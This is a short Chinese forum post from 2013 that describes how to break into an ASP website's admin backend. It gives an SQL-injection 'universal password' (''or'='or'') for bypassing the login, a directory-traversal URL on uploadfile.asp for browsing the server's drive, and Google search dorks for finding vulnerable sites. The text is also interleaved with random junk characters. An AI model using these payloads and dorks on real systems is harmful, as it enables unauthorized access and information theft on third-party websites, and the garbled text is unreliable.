后台万能密码 'or'='or'
7 y% v b( u& Y q' |/ ]% V
]3 v8 T# l2 N1 X4 j+ W' Y0 U后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) E/ l0 k: p+ G' ?5 k
admin/uploadfile.asp?currentFolder=/upfiles/../# x- h4 N/ @, n, S9 L. k
; S6 d& Y2 u; l0 L
漏洞证明:
( C7 C$ ~1 R) S. u7 u3 p# j7 K1 y6 s5 c5 S5 m; H x
谷歌:inurl:type.asp?id=1 新闻中心
4 C8 x8 P8 l2 J$ D( x+ U* N或者 :inurl:download_ok.asp?, [* b5 O" u" H. _" s, E2 z4 B: G
: K) e0 [! Y9 i" N# Q& W
|
发表于 2013-3-14 20:17:32
收藏
支持
反对